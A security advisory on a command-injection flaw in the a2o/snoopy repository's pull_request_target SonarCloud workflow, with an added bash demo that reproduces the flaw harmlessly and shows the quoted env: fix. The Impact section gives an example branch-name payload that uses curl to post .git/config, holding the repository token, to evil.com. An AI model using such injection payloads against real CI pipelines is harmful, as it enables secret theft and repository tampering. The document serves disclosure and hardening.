Coordinated Disclosure Timeline

Summary

The code-qa-sonarcloud.yml GitHub workflow runs on the pull_request_target event and interpolates attacker-controlled pull request data into a shell command. A pull request from a fork can therefore execute arbitrary commands in the privileged workflow context, allowing unauthorized modification of the base repository or exfiltration of secrets.

Product

a2o/snoopy repository

Tested Version

The latest revision of code-qa-sonarcloud.yml as of the date of this report.

Details

Issue: The pull request's head branch name (and the head repository owner's login) is interpolated directly into a shell command in a pull_request_target workflow

on:
...
  pull_request_target:
...
      - name: Scan and submit to SonarCloud - on PR
        run: |
            CURRENT_BRANCH_NAME=`git branch --show-current`
            SONARCLOUD_TAG=`./dev-tools/libexec/get-sonarcloud-tag.sh`
            /opt/sonar-scanner \
              -Dsonar.organization=a2o \
              -Dsonar.projectKey=snoopy \
              -Dsonar.sources=. \
              -Dsonar.pullrequest.provider=github \
              -Dsonar.pullrequest.key=${{ github.event.pull_request.number }} \
              -Dsonar.pullrequest.branch=${{github.event.pull_request.head.repo.owner.login}}:${{github.event.pull_request.head.ref}} \
...
        env:
          SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }}

Impact

Because the workflow is triggered by pull_request_target, the job runs in the context of the base repository with access to its secrets (for example SONAR_TOKEN) and a repository token that can write to it. The head branch name is chosen by the pull request author and is spliced, unquoted, into the run: script, so the runner's shell parses it as code. If the repository owner does not inspect the branch name before applying the ‘/ci run additional tests’ label, the author obtains arbitrary command execution on the runner, which allows unauthorized modification of the base repository and exfiltration of secrets. For example, a pull request from a branch named a;${IFS}curl${IFS}-d${IFS}@.git/config${IFS}evil.com${IFS}# would post the checked-out repository's .git/config, where the repository token is persisted, to the attacker-controlled server. The ${IFS} sequences stand in for whitespace, which Git does not allow in a ref name, and the ; terminates the scanner command so that the attacker's command runs next.
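The following bash script is an added demonstration, not code from the snoopy project or from this advisory. It imitates what GitHub Actions does to a run: script (the ${{ ... }} expression is substituted textually before the shell ever parses the script; here the placeholder __HEAD_REF__ stands for the expression) and runs the result once in the vulnerable shape and once in the hardened shape, where the expression is instead assigned to a variable in the step's env: block and the script reads "$HEAD_REF" double-quoted. The branch name, the marker file path and the echo stand-in for the scanner command are all constructed for the demo; the injected payload only creates a file instead of posting .git/config to a remote server.

```bash
#!/usr/bin/env bash
# Added demonstration; not code from the snoopy project or this advisory.
# Shows why splicing ${{ github.event.pull_request.head.ref }} into a
# `run:` script is command injection, and why moving the expression into
# the step's `env:` block and reading "$HEAD_REF" in the script is safe.
#
# GitHub Actions replaces ${{ ... }} expressions textually in the script
# BEFORE the shell parses it. render() imitates that expansion; the token
# __HEAD_REF__ stands for the expression.

# Scratch file created by the injected command (constructed for the demo;
# a real payload would post .git/config to an attacker's server instead).
MARKER="/tmp/ghsl_2021_015_demo_$$"

# Attacker-chosen branch name. Git forbids spaces in ref names, so ${IFS}
# (the shell's field separator, i.e. whitespace) is used instead; the `;`
# ends the scanner command so the attacker's command runs next.
EVIL_REF="a;\${IFS}touch\${IFS}${MARKER}"

render() {  # $1 = script template, $2 = value substituted for __HEAD_REF__
  printf '%s\n' "$1" | sed "s|__HEAD_REF__|$2|"
}

# Vulnerable shape, as in the original workflow: the value becomes part of
# the command text, unquoted, and is parsed as shell code.
VULN_TEMPLATE='echo -Dsonar.pullrequest.branch=owner:__HEAD_REF__'

# Hardened shape. The workflow step would carry
#   env:
#     HEAD_REF: ${{ github.event.pull_request.head.ref }}
# and the script only reads the variable, double-quoted, so the value is
# data and is never re-parsed as code.
SAFE_SCRIPT='echo -Dsonar.pullrequest.branch=owner:"$HEAD_REF"'

run_vulnerable() {  # exit status 0 if the injected command executed
  rm -f "$MARKER"
  bash -c "$(render "$VULN_TEMPLATE" "$EVIL_REF")" >/dev/null 2>&1 || true
  [ -e "$MARKER" ]
}

run_hardened() {    # exit status 0 if the injected command executed
  rm -f "$MARKER"
  HEAD_REF="$EVIL_REF" bash -c "$SAFE_SCRIPT" >/dev/null 2>&1 || true
  [ -e "$MARKER" ]
}

if run_vulnerable; then
  echo "vulnerable template: attacker command ran (marker file created)"
fi
if ! run_hardened; then
  echo "hardened script: branch name stayed inert data"
fi
rm -f "$MARKER"
```

The same rule applies to every other expression derived from the pull request (head.repo.owner.login, the PR title or body, commit messages): route it through env: and quote it, never into the command text. Independently of quoting, a pull_request_target job should not check out and execute the pull request head with the repository token persisted, since that is what turns command execution into a token leak.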

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-015 in any communication regarding this issue.